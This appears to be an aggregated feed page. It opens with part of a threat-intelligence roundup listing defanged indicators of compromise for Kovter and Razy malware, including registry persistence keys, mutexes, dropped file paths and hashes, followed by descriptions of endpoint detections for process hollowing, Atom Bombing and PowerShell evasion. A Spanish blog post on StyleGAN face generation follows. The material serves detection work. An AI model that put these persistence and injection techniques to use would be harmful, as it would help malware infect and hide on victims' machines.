smtp-mail[.]outlook[.]com10
smtp[.]1und1[.]de10
smtp[.]aol[.]com8
smtp[.]emailsrvr[.]com7
smtpout[.]asia[.]secureserver[.]net6
smtp[.]1and1[.]com6
smtp[.]rediffmailpro[.]com6
smtp[.]comcast[.]net6
smtp[.]263[.]net6
spam[.]pantos[.]com6
mail[.]longi-silicon[.]com5
smtp[.]prodigy[.]net[.]mx5
mail[.]huaqin[.]com5
betmngr[.]com5
smtp[.]yandex[.]com4
smtp[.]zoho[.]com4
smtp3[.]netcore[.]co[.]in4
smtp[.]mweb[.]co[.]za4
See JSON for more IOCs
Files and or directories createdOccurrences
%SystemRoot%\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat29
%HOMEPATH%\423.exe29
%SystemRoot%\SysWOW64\version.dll1
%SystemRoot%\Globalization\Sorting\sortdefault.nls1
\REGISTRY\MACHINE\SOFTWARE\Classes\Word.Document.81
%TEMP%\CVR90.tmp1
%SystemRoot%\SysWOW64\sourcebulka.exe1
%SystemRoot%\SysWOW64\3HqWfmuWUBgMP.exe1
%SystemRoot%\Temp\76D.tmp1
%SystemRoot%\SysWOW64\jq9Mk4Che.exe1
File Hashes
  • 1e0b73c5ec4b9516709c10ec708fc295df021451f958a89144d79d99604b3664
  • 325701284bf17203d71a9c5b4d46e4f7b651164ab92c643fe64a3e3bc2844dad
  • 3537f5cfc0ad20b8061b67f82dc43a7ac1856391bece8158023fcc3d6699f75a
  • 35965e3b9cff6a78e1331ed07f5e327a91301b5b023b20fb0c107bc3574b3a08
  • 3889458cad2eccfcd7f8ec5c842dd30edec24f36a37abde0e9359dd7117524e7
  • 3eb7c725b886abf672613a63d1c17c479f1144f1262a6c3cd66a44fe74581383
  • 407f21c8583dbf70a0069162b9f7c0ec142b63e05d4d94ec8e4c85345bf759d9
  • 51ee3cc17fa697ec7de8a60ea5ad2af4195de73c95401b1b17e7b9c346ed9c1a
  • 5a33cba1e854fb298486fe6ba6ebb071e045cb698aec109561178b2a66567662
  • 5eefdd75abcd812db0c1fe74f071dcb2c50ac7c9b73144900b9918fe8930af2b
  • 601804d1434691765b258649f0a9c8924bb1b28b5ff0dc2bafb3039b2c78f6a3
  • 65344e20c9e346e62bec15f369fcdbb619d64b362483feb36a6d60e3007c22db
  • 6f5795d34e8fa33548042554f0b05b6e79e9a68783f28a196476261a0de0e068
  • 72966d743059492c8caf5689758cdf98275e087cf5bf9d0e7914db1e4472fc05
  • 751ccbeabee910ea022ebc97fde11d5e1c3bba9f83b6d2df09a927924eb1e60e
  • 77ccc470c377e4a22e0091d0abd3f91cec17b6e06c0e17d8f87dbbbd735bfe0b
  • 7bfa867554a7f1a6a891712cfdaaf519bd44bdf53e0047930890495c9655ab7e
  • 8391f3706e60079dbdbeee083f8bda85915cc763bd683bb00270f694a031c66a
  • 9e40d6af4d13a6d65e179c109b4676c691fbf0b2de6deb0d84625e654989fa0d
  • 9fe28f27c0db9df3580f65069affb7f47171d910f69035ffdeeac5a545ab4ec9
  • a1be08364eef857af56f506b206e780c803c212b76dbac8dc17e7983d08f65ff
  • a50d314e9c13d667641b11c73695980d1fd4cc0020cd7f760bdbd88bf95b1c3c
  • a95ddd15ef6f38762fbc16ca31539aabbf15c3c10d0c103cb4c204c88bfbbadf
  • ac957b3a3b4e8d75ead5dabd4b70e28e27a697a719322071d66cfb796d3b28f6
  • b1709a55b71ba9559aa839eb5304e2fc2388ae6275771b6cbbf8f49ac3e355fa
  • See JSON for more IOCs

Coverage


Screenshots of Detection

AMP

ThreatGrid

Umbrella

Malware

Win.Dropper.Kovter-6956146-0


Indicators of Compromise


Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: internat.exe
25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE
Value Name: DisableOSUpgrade
25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE
Value Name: ReservationsAllowed
25
<HKLM>\SOFTWARE\WOW6432NODE\XVYG
Value Name: xedvpa
25
<HKCU>\SOFTWARE\XVYG
Value Name: xedvpa
25
<HKCR>\.8CA9D79 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: vrxzdhbyv
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ssishoff
25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WindowsUpdate 25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUpgrade 25
<HKCU>\SOFTWARE\xvyg 25
<HKLM>\SOFTWARE\WOW6432NODE\xvyg 25
<HKCR>\c3b616 25
<HKCR>\C3B616\shell 25
<HKCR>\C3B616\SHELL\open 25
<HKCR>\C3B616\SHELL\OPEN\command 25
<HKCR>\.8ca9d79 25
<HKU>\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION 25
<HKLM>\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101
Value Name: CheckSetting
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103
Value Name: CheckSetting
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100
Value Name: CheckSetting
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102
Value Name: CheckSetting
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104
Value Name: CheckSetting
25
<HKCU>\SOFTWARE\XVYG
Value Name: tnzok
25
MutexesOccurrences
EA4EC370D1E573DA25
A83BAA13F950654C25
Global\7A7146875A8CDE1E25
B3E8F6F86CDD9D8B25
\BaseNamedObjects\408D8D94EC4F66FC24
\BaseNamedObjects\Global\350160F4882D1C9824
\BaseNamedObjects\053C7D611BC8DF3A24
\BaseNamedObjects\Global\9F84EBC0DC30D3FA1
\BaseNamedObjects\CF2F399CCFD463691
\BaseNamedObjects\8450CD062CD6D8BB1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
107[.]160[.]89[.]932
123[.]94[.]5[.]731
6[.]179[.]232[.]2091
132[.]130[.]129[.]2021
87[.]221[.]222[.]1761
222[.]187[.]133[.]2381
126[.]207[.]27[.]581
191[.]12[.]150[.]1891
92[.]253[.]215[.]1241
53[.]136[.]182[.]721
188[.]232[.]142[.]2361
75[.]134[.]228[.]1371
15[.]17[.]189[.]2141
218[.]10[.]226[.]1841
160[.]60[.]207[.]381
107[.]98[.]132[.]1131
134[.]68[.]158[.]41
56[.]177[.]25[.]241
52[.]196[.]162[.]1381
133[.]251[.]164[.]1061
108[.]118[.]74[.]1421
33[.]198[.]16[.]91
18[.]75[.]88[.]1341
58[.]184[.]135[.]771
77[.]189[.]216[.]1941
See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
www[.]cloudflare[.]com1
bleez[.]com[.]br1
lojadeunatelha[.]com[.]br1
revenda[.]lojadeunatelha[.]com[.]br1
easyfax[.]nrtnortheast[.]com1
www[.]username[.]n[.]nu1
www[.]n[.]nu1
staticjw[.]com1
www[.]acquia[.]com1
network[.]acquia[.]com1
Files and or directories createdOccurrences
%LOCALAPPDATA%\4dd3cc\519d0f.bat25
%LOCALAPPDATA%\4dd3cc\8e9866.8ca9d7925
%LOCALAPPDATA%\4dd3cc\d95adb.lnk25
%APPDATA%\b08d66\0b3c0b.8ca9d7925
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\Preferred25
%LOCALAPPDATA%\4dd3cc25
%APPDATA%\b08d6625
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\91b4e5.lnk25
%APPDATA%\db7a\c227.a778324
%HOMEPATH%\Local Settings\Application Data\f4fa\97ea.lnk24
%HOMEPATH%\Local Settings\Application Data\f4fa\c0ce.bat24
%HOMEPATH%\Local Settings\Application Data\f4fa\d5a9.a778324
%HOMEPATH%\Start Menu\Programs\Startup\d733.lnk24
%HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\C5MZMU22\desktop.ini3
%APPDATA%\Microsoft\Windows\Cookies\S2KTL2FI.txt2
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\83549e0e-3d04-434f-8fd8-6118f60c376b2
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\83549e0e-3d04-434f-8fd0-5619f60c376b2
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\83549e0e-3d04-434f-8fdf-6619f60c376b2
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\1E8X74FH.htm2
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\83549e0e-3d04-434f-8fdf-5e19f60c376b2
%APPDATA%\Microsoft\Windows\Cookies\0TSDIW0B.txt1
%APPDATA%\Microsoft\Windows\Cookies\UGH0HZQB.txt1
%APPDATA%\Microsoft\Windows\Cookies\ZLTD4G06.txt1
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\83549e0e-3d04-434f-8fd2-6219f60c376b1
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\83549e0e-3d04-434f-8fdd-6619f60c376b1
See JSON for more IOCs
File Hashes
  • 0699fc68be026ed52555783f4ca395dcd68dd93898e9ee1756e0ffe9493c300a
  • 06a3a8ebf6965042378a003857434f775a014293830a3d02d468b02b02f13329
  • 0826313d6cdb1c85d39edf77f5faeaff0241f09a8bc6ad8ea4453cab46628dd6
  • 2adfbe4ebd34d062e774d20d300e80ec31cdf4d59b018be2a45e644341c55f97
  • 2e7aa46acaacad3f7e1675d3090ae7669efcffb91beb976cdf93d69782fe5453
  • 2fbdb93de7475386719d620bd685b955ec05cca0f458579daa9932023351040b
  • 31d170788a623341e4d6636e1dec87b9812a1967441415bcb8097d3b4a4bdfee
  • 3337a63c7f42977759f9a961af5c7265abfe0489d68c48f90d066b40d84c0ddd
  • 3754208c5f620f262726467daac435fbcc3a262dde1620c876b72459750fc90d
  • 39b74f9fad057cc9603e2a7a716236c9671dc08abdf7e64c37ef2d2b53acf691
  • 4297d27c8909c9c40b311827f40bf195ffbb6c1ee8bef5f9203465cb10cab9bc
  • 477c74758b4c59334fcdb2051089efbe191d2cda4252aecea59b13bb93bfb101
  • 4802c24fcb2d97233d22b26077714ca09fe47f6602586da0f96965af41adecb6
  • 4be5d24a7846b4ef102b47c0488140194b49c145353259fc581fa0da4068d84a
  • 4e3b31344f80b1693ee28cedb5109a9a4e522c8ef225f6087e480954fa76b3d6
  • 5061a14b94f0794e79e4cc57a49a38c422cf30171df07282a5de10fbac455b01
  • 50939d9ddcc87d1d2e8a3c81a7683b42beeb86471fd2e4da903f062086203d5e
  • 58f3ac23dd98672c20e01c5963b11fba8b077031c7ac41f156a37d2306b812aa
  • 66d2f5f39b4fbb1cab2a4c23d696add166f6dec3ae4dcba20a1c2f89b35d4b08
  • 7199c5b3a081ae13f6b6fc457196f62ecaf3240b39b728f1255f9d3ccc86f853
  • 812e4481d2e23732e41d4e58cd19eccbd53fceba8273ea9bbd1bcaf3da13766f
  • 822bf74cf43fdfd74ef7edd6a4c52dc2ca32dd8a866afbdbd4ae933cd531dd6e
  • 8580001fd28261a74f92594fe42a01012e202e3322a35004857b6881fa73ee9a
  • 8e9f427bca537dfa11df3360b71788dc2dd70cfad927d852094f1c07e8cf2c64
  • 94ff1192ecf870614b1f98103ade1ba1ad46153ddeb8a0c3a07a76ab4461e377
  • See JSON for more IOCs

Coverage


Screenshots of Detection

AMP

ThreatGrid

Win.Trojan.Razy-6956092-0


Indicators of Compromise


Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: internat.exe
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\avkaxoq 19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: Type
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: Start
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: ErrorControl
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: ImagePath
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: DisplayName
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: DependOnService
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: DependOnGroup
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: WOW64
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: ObjectName
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\aqejpwsx 6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: Type
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: Start
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: ErrorControl
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: ImagePath
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: DisplayName
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: DependOnService
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: DependOnGroup
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: WOW64
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: ObjectName
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: mrldn
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ovsuw
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: twgqm
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: eqlshtrx
1
MutexesOccurrences
llzeou25
Global\amztgg19
amztgga19
Global\eqfik6
eqfika6
\BaseNamedObjects\eucofa1
003c194a95c7849375590c48f1c5bc5fÐ÷XAdministra1
02b5f67a3eba31421dc595a7efed8e0a1
0e390dd0547334471c08c3b8b4e7ec3aÐ÷IAdministra1
087ddce345ea3ed2fed8d02dd466026cÐ÷QAdministra1
14a95d66f90495fcc278258097ed704aÐ÷ Administra1
10435b4efc8049d260d4b36673f7d656Ð÷.Administra1
1dd13f0648a70754c883c6262c3633c1Ð÷CAdministra1
3afec20c013fca0abef646a7a6f0f5cdÐ÷dAdministra1
385f6390936d000f4d9db3e30b117aca1
3dede5abeacdabc758f70beef2984aca1
3f61be1a4bcb773c48a6dc7ed4898387Ð÷:Administra1
401b399a3aa67d42306ce7291299b7f2Ð÷6Administra1
897b0a510174cbc4757982703e42a0ca1
76097734f64ce5ae9b008273431fa4c8Ð÷9Administra1
8ae8d944960e54c7a833875f71bdae62Ð÷2Administra1
88cb1af973183aa93bf10d74440333b6Ð÷/Administra1
\BaseNamedObjects\380065180a1
\BaseNamedObjects\getnia1
\BaseNamedObjects\xabzsenoa1
See JSON for more IOCs
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
N/A-
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
N/A-
Files and or directories createdOccurrences
%APPDATA%\Microsoft\Amztggm19
%APPDATA%\Microsoft\Amztggm\amztg.dll19
%APPDATA%\Microsoft\Amztggm\amztgg.exe19
%TEMP%\~amztgg.tmp19
%APPDATA%\Microsoft\Eqfikq6
%APPDATA%\Microsoft\Eqfikq\eqfi.dll6
%APPDATA%\Microsoft\Eqfikq\eqfik.exe6
%TEMP%\~eqfik.tmp6
%APPDATA%\Microsoft\Ilgqyl\ilgqy.exe1
%APPDATA%\Microsoft\Duazxlbu\duazxl.dll1
%APPDATA%\Microsoft\Duazxlbu\duazxlb.exe1
%APPDATA%\Microsoft\Jeofze\jeof.dll1
%APPDATA%\Microsoft\Jeofze\jeofz.exe1
%APPDATA%\Microsoft\Ssfsns\ssfs.dll1
%APPDATA%\Microsoft\Ssfsns\ssfsn.exe1
%APPDATA%\Microsoft\Dcpptfmac\dcpptfm.dll1
%APPDATA%\Microsoft\Dcpptfmac\dcpptfma.exe1
%APPDATA%\Microsoft\Taozsa\taoz.dll1
%APPDATA%\Microsoft\Taozsa\taozs.exe1
%APPDATA%\Microsoft\Eucofu\euco.dll1
%APPDATA%\Microsoft\Eucofu\eucof.exe1
%APPDATA%\Microsoft\Getnie\getn.dll1
%APPDATA%\Microsoft\Getnie\getni.exe1
%APPDATA%\Microsoft\Xabzsenoa\xabzsen.dll1
%APPDATA%\Microsoft\Xabzsenoa\xabzseno.exe1
See JSON for more IOCs
File Hashes
  • 003c194a95c7849375590c48f1c5bc5fa23099976e09c997f29b22b367c1d3d2
  • 005055ca28d6866f033aff3753a1ef7c4064b5e094eaa663953407a9b19c6a71
  • 02b5f67a3eba31421dc595a7efed8e04834e9f0121c8bcd0186e99dba9781171
  • 087ddce345ea3ed2fed8d02dd466026c0fc0fa5aa7749b392683311fd97a80e2
  • 0e390dd0547334471c08c3b8b4e7ec3ad1d8fe4facabdb5df674af76c8e149d0
  • 10435b4efc8049d260d4b36673f7d656b9fa7163d00840acd0860175e2a79f47
  • 14a95d66f90495fcc278258097ed704aca265dd6bbb966903abe00dd7225cd11
  • 1dd13f0648a70754c883c6262c3633c19aeffa4e3558f0f16da78fc796a76cf1
  • 385f6390936d000f4d9db3e30b117ac382f70f4b7d1f3f4af06808e26683bf3d
  • 3afec20c013fca0abef646a7a6f0f5cdd3826541587cfd93c25033a35e588cb2
  • 3dede5abeacdabc758f70beef2984ac184bbec3112be97e891bb64abb2981373
  • 3f61be1a4bcb773c48a6dc7ed489838796a6b512bc14a517a667fb28a2a8e3ee
  • 401b399a3aa67d42306ce7291299b7f25a24345a980a7bd719c96a6834b9bf48
  • 52c90c5917cb1c6955f68c5b03e448b976ec3f1c258eb6039c5da399b2fd41db
  • 581d9e271871b1948191755bc99e2e9ec5346408f39613aec5c3b1e52d0449bd
  • 649e6217744762016fadb2f7f36a654c607ad160d136714946aa6e0478dc7a87
  • 673e3e8e62b09e39c161091ee70f046c038ba6f24f2a1da135af23bcc1701c20
  • 69c3c4ee664fc814ef070ae902ebaa305eda6ffd23a10e5b97afe49c1300ebff
  • 69d9d27ab1c802cd322c1b7795bda4de65cc7447982076f1e2d6873a8423d57f
  • 6aad36b27c188e73090f3b79352750489a1dce20f5396e63b2af3e998eba0f0a
  • 6e01014528a359c81851b2197a4656e13d87b15424dc961cc6d770e4d4c747ee
  • 76097734f64ce5ae9b008273431fa4c81e32b05a9b8586c39b80e68ee70d0a8a
  • 88cb1af973183aa93bf10d74440333b622206be6d0bd77322c6f8689f2cf24ec
  • 897b0a510174cbc4757982703e42a0c14c4bdba0e6bf77db5a6f94a3c2651f3a
  • 8ae8d944960e54c7a833875f71bdae6243e7fa380ae3fd8176b07cb7d7819508
  • See JSON for more IOCs

Coverage


Screenshots of Detection

AMP

ThreatGrid

Exprev

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
  • Kovter injection detected (4469)
    A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
  • Madshi injection detected (3542)
    Madshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique.
  • PowerShell file-less infection detected (2488)
    A PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families.
  • Process hollowing detected (541)
    Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
  • Gamarue malware detected (240)
    Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
  • Dealply adware detected (221)
    DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
  • Suspicious PowerShell execution detected (156)
    A PowerShell command has attempted to bypass execution policy to run unsigned or untrusted script content. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
  • Installcore adware detected (65)
    Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
  • Atom Bombing code injection technique detected (65)
    A process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well.
  • Excessively long PowerShell command detected (57)
    A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.

Wired: Security: A Hacking Spree, a Fight for Open Internet, and More News

$
0
0
Catch up on the most important news today in 2 minutes or less.

Un informático en el lado del mal: Style GAN: Una AI para crear perfiles de personas que NO existen

$
0
0
Ya hemos hablado en muchas ocasiones de las GANs (Generative Adversarial Networks) que empezamos a utilizar para hacer un Face Swapping (el que me hicieron con Axl Rose) y generar unos vídeos falsos para crear Fake News documentadas con material audio-visual. Y nuestros compañeros Pablo González y Enrique Blanco explicaron en la pasada RootedCONcómo entrenar una GAN para generar imágenes en streaming de vídeo en tiempo real y suplantar por vídeo conferencia a una persona - como hicieron conmigo -.

Figura 1: Style GAN: Una AI para crear perfiles de personas que NO existen

Antes de seguir con el artículo de hoy, os dejo todos los artículos que hemos escrito sobre las GANs en este blog, porque merece la pena que los leas pare entender un poco más todas las posibilidades que ofrecen:


Las posibilidades que abre el uso de técnicas de Inteligencia Artificial para realizar tareas complejas con algoritmos que de otra forma sería imposible generar son muchas. Y en el caso de las GANs, donde enfrentamos una AI entrenada - a la que llamamos Discriminador - con una AI que está aprendiendo - a la que se llama Generador - abren muchas posibilidades al aprendizaje más allá de los datos existentes, por lo que las AI pueden crear cosas que no existen, como personas.

Figura 2: Esquema de una GAN

En el caso de hoy quería hablaros de una GAN que se llama Stype GAN con la que han creado un proyecto más que particular , y que abre una infinidad de posibilidades a la creación de personas reales, que realmente no existen. Se llama This Person Does Not Exist y se basa en la generación de fotos hiperrealistas mezclando caras y estilos entre dos personas.
La idea es muy similar a la que contamos con el caso del FaceSwapping, donde se capturaba fotograma a fotograma la cara de las personas y se generaban unos estados que se llaman "Latentes" intermedios en los que se buscan formas y estructuras de todas las caras que aparecían en los dos vídeos. Es decir, tenemos el vídeo A donde hay una persona haciendo cosas y pone diferentes rostros. 

Figura 4: Intercambio de estados latentes para hacer el FaceSwapping

Sobre ese vídeo A, queremos poner un rostro que sale de una persona que está en el vídeo B. Entonces, una vez que tenemos todos los estados latentes de las caras en el vídeo A, se busca en el vídeo B cuál es el rostro en estado "Latente" más similar al del vídeo A. Se sustituye el estado latente de B en el fotograma de A y se comienza a entrenar la GAN buscado que el Discriminador de por buenos todos los instantes de vídeo de A con la cara de B que va creando el Generador. Cuanto más entrenamiento, más nivel de realismo.

StyleGAN

En el caso de Style GAN, el proceso es similar, pero no buscando los rostros de las personas, sino los "estilos", es decir, los peinados, expresiones, los objetos decorativos, etcétera, que se pueden extraer de dos caras reales. Así, el proceso es bastante peculiar. Se cuentan con dos juegos de fotografías de personas que sí que existen, y que además se han utilizado para entrenar al Discriminador. El proceso después se refina para que el resultado sea tan realista como lo que veis en la web. En este artículo lo explican en detalle: How StyleGAN Works.

Figura 5: En Style GAN se mezclan fotos de personas que existen y se mezclan los estilos

Se generan dos estados Latentes de dos fotografías de esas personas y se le pasa el "estilo" de una a la otra. El Generador hace una imagen y se la envía al Discriminador que tiene que decir si es una persona real o no. Con entrenamiento, el resultado es el que podéis ver en la web.

Figura 6: Una foto de una persona que no existe creada por StyleGAN en ThisPersonDoesNotExit

Cada vez que se hace clic sobre el enlace, la AI entrenada te da una imagen diferente de una persona que no existe que ha sido creada a partir de otras dos que sí que existían. El proceso lo tenéis explicado en este vídeo que han hecho para el proyecto.

Figura 7: Cómo funciona StyleGAN

Por supuesto, la gente puede utilizar estas fotos para crear perfiles falsos en redes sociales, o webs de cualquier índole, pero lo mejor es que el código está en GitHub con lo que tú, eligiendo dos personas de las que tengas muchas fotos, puedes hacerte una vida completa de una persona que no existe, con lo que la realidad de la web 2.0 puede ser cada vez menos real.
La verdad es que se me han ocurrido muchas ideas con esta tecnología, así que probablemente no será la última vez que hable de ella por aquí. El mundo de posibilidades que abre el uso de estas técnicas de Inteligencia Artificial es increíble. 

Saludos Malignos!
Viewing all 12054 articles
Browse latest View live